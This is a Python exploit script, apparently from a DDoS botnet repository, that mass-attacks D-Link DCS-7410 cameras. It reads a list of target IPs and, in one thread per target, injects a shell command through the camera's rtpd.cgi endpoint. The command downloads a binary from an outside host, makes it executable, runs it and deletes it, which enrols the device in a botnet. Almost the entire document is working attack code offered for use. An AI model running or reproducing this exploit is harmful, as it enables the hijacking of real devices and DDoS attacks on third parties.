Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Exploits/DCS-7410/dlink_dcs.py
5038 views
1
# D-LINK DCS-7410 "RonBurgundy" Vulnerability
2
import os
3
import sys
4
import time
5
import threading
6
import requests
7
8
ips = open(sys.argv[1], "r").read().splitlines()
9
10
headers = {
11
"User-Agent" : "Y0uArEb1GgAY/1.0",
12
}
13
f = 0
14
s = 0
15
16
def exploit(ron):
17
try:
18
global s
19
url = 'http://'+ ron +'/cgi-bin/rtpd.cgi?wget&http:/b4.ck.do.or/ron;chmod&777&ron;./ron;rm&-rf&ron'
20
requests.get(url, headers=headers, timeout=5)
21
s += 1
22
except:
23
global f
24
f +=1
25
pass
26
27
print 'Fail | Success'
28
def main(burgundy):
29
sys.stdout.flush()
30
sys.stdout.write('\r\x1b[0m|\x1b[0;32m'+str(f)+' \x1b[0m|\x1b[0;33m' + str(s) + ' \x1b[0m|\x1b[1;34m')
31
sys.stdout.flush()
32
exploit(burgundy)
33
34
35
for lel in ips:
36
t = threading.Thread(target=main, args = (lel,))
37
t.start()
38